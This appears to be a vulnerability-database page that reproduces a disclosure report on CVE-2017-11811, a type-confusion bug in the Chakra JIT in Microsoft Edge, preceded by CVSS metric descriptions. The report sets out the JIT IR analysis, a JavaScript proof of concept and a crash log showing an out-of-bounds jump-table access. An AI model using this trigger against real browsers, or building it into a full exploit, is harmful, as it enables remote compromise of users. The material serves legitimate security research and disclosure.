The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
High
PR
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Microsoft Edge Chakra JIT Type Confusion
Microsoft Edge: Chakra: JIT: Type confusion with switch statements
CVE-2017-11811
Let's start with a switch statement and its IR code for JIT.
JS:
for (let i = 0; i < 100; i++) {
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IRs before Type Specialization:
s26.var = Ld_A s24.var - "i" #0011 Bailout: #0011 (BailOutExpectingInteger)
BrLt_A $L2, s26.var, s5.var #0070
$L9: #0070
BrGt_A $L2, s26.var, s23.var #0070
$L8: #0070
s28.var = Sub_A s26.var, 2 (0x2).i32 #0070 // Because of the minimum case is 2, subtracting 2 from i. s28 is a temporary variable.
MultiBr ..., s28.var #0070
IRs after Type Specialization:
s52(s26).i32 = Ld_A s51(s24).i32 - "i" #0011
BrLt_I4 $L2, s51(s24).i32, 2 (0x2).i32 #0070
$L9: #0070
BrGt_I4 $L2, s51(s24).i32, 38 (0x26).i32 #0070
$L8: #0070
s53(s28).i32 = Sub_I4 s51(s24).i32, 2 (0x2).i32 #0070
MultiBr ..., s53(s28).i32! #0070
MultiBr instructions' offset operand(s28 in the above) must be of type Int32. If not, type confusion will occur. The way to ensure it is to use BailOutExpectingInteger.
In the above code, "s26" is ensured to be of type Int32 by the bailout. So, the other variables affected by "s26" including the offset variable "s28" are also ensured to be of type Int32. But in the Common Subexpression Elimination phase, it doesn't consider the bailouts. So we can abuse this.
Common Subexpression Elimination: <a href="https://en.wikipedia.org/wiki/Common_subexpression_elimination" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Common_subexpression_elimination</a>
What I noticed is "s28.var = Sub_A s26.var, 2 (0x2).i32". If we declare a variable "j" with "i - 2", the offset variable "s28" will be replaced with "j".
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s55(s28).i32 = Sub_I4 s54(s24).i32, 2 (0x2).i32 #0013
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a // BailOutExpectingInteger
BrLt_I4 $L2, s54(s24).i32, 2 (0x2).i32 #0079
BrGt_I4 $L2, s54(s24).i32, 38 (0x26).i32 #0079
MultiBr ..., s55(s28).i32! #0079
The offset variable is replaced with "j" that is not ensured to be of type Int32. The next step is just to create a case that "j" can't be of type Int32.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 39)
i = 'aaaa';
}
(Actually "j" is always Int32 in the above code. But Chakra can't distinguish.)
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s30[LikelyCanBeTaggedValue_Int].var = Sub_A s26[LikelyCanBeTaggedValue_Int_Number].var, 0x1000000000002.var #0013
s27[LikelyCanBeTaggedValue_Int].var = Ld_A s30[isTempLastUse][LikelyCanBeTaggedValue_Int].var! #0017
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a
s63(s26).i32 = FromVar s26[LikelyCanBeTaggedValue_Int_Number].var #001a Bailout: #001a (BailOutExpectingInteger)
BrLt_I4 $L4, s63(s26).i32, 2 (0x2).i32 #0079
BrGt_I4 $L4, s63(s26).i32, 38 (0x26).i32 #0079
MultiBr ..., s27[LikelyCanBeTaggedValue_Int].var #0079
It ended up to use "j" of type Var as the offset variable.
PoC:
function opt() {
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 90) {
i = 'x';
}
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
Crash Log:
RAX: 0x1
RBX: 0x7ffff7e04824 --> 0x100000000
RCX: 0x3
RDX: 0x7ffff0b20667 (loope 0x7ffff0b2066d)
RSI: 0x80000001
RDI: 0x7ffff0c182a0 --> 0x7ffff6478a10 --> 0x7ffff5986230 (<Js::DynamicObject::Finalize(bool)>: push rbp)
RBP: 0x7fffffff2130 --> 0x7fffffff21b0 --> 0x7fffffff2400 --> 0x7fffffff2480 --> 0x7fffffff24d0 --> 0x7fffffff52f0 (--> ...)
RSP: 0x7fffffff20c0 --> 0x1111015500000002
RIP: 0x7ffff0b204da (mov rdx,QWORD PTR [rdx+<a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>*8])
<a href="https://crrev.com/8" title="" class="" rel="nofollow">R8</a> : 0x0
<a href="https://crrev.com/9" title="" class="" rel="nofollow">R9</a> : 0x0
<a href="https://crrev.com/10" title="" class="" rel="nofollow">R10</a>: 0x7ffff0b20400 (movabs rax,0x555555879018)
<a href="https://crrev.com/11" title="" class="" rel="nofollow">R11</a>: 0x206
<a href="https://crrev.com/12" title="" class="" rel="nofollow">R12</a>: 0x7fffffff5580 --> 0x7ffff0ba0000 --> 0xeb021a471b4f1a4f
<a href="https://crrev.com/13" title="" class="" rel="nofollow">R13</a>: 0x1000000000001 << Var 1
<a href="https://crrev.com/14" title="" class="" rel="nofollow">R14</a>: 0x1000000000003
<a href="https://crrev.com/15" title="" class="" rel="nofollow">R15</a>: 0x7ffff0c79040 --> 0x7ffff643c050 --> 0x7ffff5521130 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff0b204cb: cmp ecx,0x26
0x7ffff0b204ce: jg 0x7ffff0b204e1
0x7ffff0b204d0: movabs rdx,0x7ffff0b20667
=> 0x7ffff0b204da: mov rdx,QWORD PTR [rdx+<a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>*8]
0x7ffff0b204de: rex.W jmp rdx
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum